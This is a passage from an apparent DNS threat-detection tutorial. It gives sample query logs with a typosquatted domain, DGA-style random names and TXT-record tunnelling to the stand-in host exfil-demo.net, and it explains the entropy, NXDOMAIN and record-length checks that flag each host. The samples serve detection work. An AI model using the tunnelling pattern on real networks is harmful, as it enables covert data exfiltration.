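HEX16 = ["9f3a7c1e5b2d8046", "2c8e0a6f4d1b3957", "7b1d9f3a5c2e4068", "e4a0c6f2b8d13579"]
SAMPLE_DNS = [
    ("ws-hr-07", "www.google.com", "A", "NOERROR"),        # ordinary workstation ...
    ("ws-hr-07", "outlook.office365.com", "A", "NOERROR"),
    ("ws-hr-07", "mail.hersheys.com", "A", "NOERROR"),
    ("ws-hr-07", "her5heys.com", "A", "NOERROR"),          # ... with the library's lookalike
    ("ws-eng-03", "xk3jq9vz2mwpl.com", "A", "NXDOMAIN"),    # DGA client: most names do not resolve
    ("ws-eng-03", "q7zt4mnb2xvw.net", "A", "NXDOMAIN"),
    ("ws-eng-03", "bfdrt9pqmzl.org", "A", "NXDOMAIN"),
    ("ws-eng-03", "ktw84fhsnq2rv.info", "A", "NOERROR"),
    ("ws-eng-03", "www.google.com", "A", "NOERROR"),
    ("ws-fin-12", "www.google.com", "A", "NOERROR"),       # tunnelling client below
] + [("ws-fin-12", f"{HEX16[i]}.{HEX16[(i + 1) % 4]}.t.exfil-demo.net", "TXT", "NOERROR")
     for i in range(4)]

if __name__ == "__main__":
    for host, p in host_profiles(SAMPLE_DNS).items():
        print(host, sorted(p["flags"]) or "clean", p)
```

Each sample host ends up with exactly one flag: ws-hr-07 for the lookalike, ws-eng-03 as a DGA host (four high-entropy names, three of them NXDOMAIN), ws-fin-12 for tunnelling (four TXT queries of 50-character names). Entropy alone is a weak signal, which is why the DGA host flag also requires NXDOMAIN churn and the tunnelling flag also looks at record type and length; freq.py, which the library lists for the DGA and certificate rows, replaces the raw entropy score with character-pair frequencies trained on real names and gives fewer false positives on legitimate CDN hostnames.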